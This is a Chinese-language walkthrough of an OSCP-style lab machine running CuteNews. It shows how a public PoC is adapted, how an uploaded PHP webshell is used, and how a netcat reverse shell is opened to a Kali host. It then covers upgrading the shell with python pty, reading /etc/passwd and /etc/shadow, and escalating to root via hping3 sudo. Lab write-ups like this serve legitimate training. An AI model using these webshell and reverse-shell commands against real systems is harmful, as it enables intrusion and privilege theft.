2. POC脚本修改

POC的脚本通常是通用脚本,很多时候是不满足具体的环境要求的,所以打开这个python脚本,可以看到跟我们的目前的环境路径不一致,多了一个/CuteNews/这个文件路径,将代码包含有这个路径的代码都去掉。然后再整体check一下。这边POC里面的payload我是没有做任何修改的,里面的payload你们也可以根据自己的需求和喜欢来进行修改。

然后重命名为cute2.py

3. 脚本运行

获得上面的用户名密码 gKQN1u2p6i  / gKQN1u2p6i

4. 终端升级,默认进到系统的是一个受限终端,升级终端

在升级终端的过程中我们发现终端不能够升级,而且试验的过程中上面的终端已经死掉了,上面的命令重新执行一次 python3 cute2.py

 看到这边的路径和路径里面的内容,可以看到这个是文件上传的路径,该路径下面还存在上面默认形成的payload文件

代码里面的内容:是命令行模式如下:

 同时在上篇信息收集后面,我们还发现有一个文件上传的

 

 用上面获得的账号登录:

 

 

 

 尝试使用上面的文件上传链接,和之前poc中已经存在的php,如下图:

链接:http://192.168.1.16/uploads/avatar_gKQN1u2p6i_gKQN1u2p6i.php?cmd=id

 从页面上面的反馈信息,可以看出这边的命令行执行可以正常促发,接下来我们来做一个反弹shell,先在kali端开启监听 (kali机器IP地址:192.168.1.18):

 网页端反弹shell如下:

http://192.168.1.16/uploads/avatar_gKQN1u2p6i_gKQN1u2p6i.php?cmd=id%20|nc%20192.168.1.18%204444%20-e%20/bin/sh

 查看服务端。从返回的信息确定反弹成功

 终端升级:

python -c 'import pty; pty.spawn("/bin/sh")'

 可以看到升级成功,然后确定一下目前的sh满足不满足要求

5. 终端提权

使用一些基本的命令

pwd / cat /etc/passwd  cat /etc/shadow  cd /root  sudo ....

 GTFOBins 在这个上面可以找到sudo有关命令的提权方式。

 

在提权前,将终端再次升级成完整终端:

 然后使用上面hping3 提权获得root的profile。再将ip地址获得一下。

这样上面这台靶机就打完了。可能其他人会有不同的打靶的思路也可以在评论区留言。

接下来就是OSCP打靶机的官方英文版报告整理: OSCP靶机练习--CuteNews03(English Report)

Logo

GitCode 天启AI是一款由 GitCode 团队打造的智能助手,基于先进的LLM(大语言模型)与多智能体 Agent 技术构建,致力于为用户提供高效、智能、多模态的创作与开发支持。它不仅支持自然语言对话,还具备处理文件、生成 PPT、撰写分析报告、开发 Web 应用等多项能力,真正做到“一句话,让 Al帮你完成复杂任务”。

更多推荐